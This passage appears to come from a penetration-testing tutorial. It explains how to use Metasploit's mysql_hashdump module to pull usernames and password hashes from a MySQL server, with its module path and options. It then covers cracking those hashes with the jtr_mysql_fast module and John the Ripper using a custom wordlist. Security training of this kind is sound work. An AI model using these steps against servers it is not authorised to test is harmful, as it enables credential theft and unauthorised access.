Dump MySQL Password Hashes
mysql_hashdump extracts the usernames and encrypted password hashes from a MySQL
server. You can then use jtr_mysql_fast module to crack them. The module is located in
auxiliary/scanner/mysql. To use it set RHOSTS option to your target’s ip address and increase
THREADS value. If you have managed to reveal root password then set also options
USERNAME and PASSWORD accordingly.
Cracking passwords with John The Ripper
Metasploit offers module jtr_mysql_fast. This module uses John the Ripper to identify weak
passwords that have been acquired from the mysql_hashdump module. John the Ripper is a
free and Open Source software password cracker, available for many operating systems such
as Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix
passwords. After having acquire MySQL hashes with mysql_hashdump module, load
jtr_mysql_fastmodule and run it.
This module offers options such as setting a custom path for john the ripper. The option that
interests you the most, is the Wordlist option, you can set it to use a custom password list.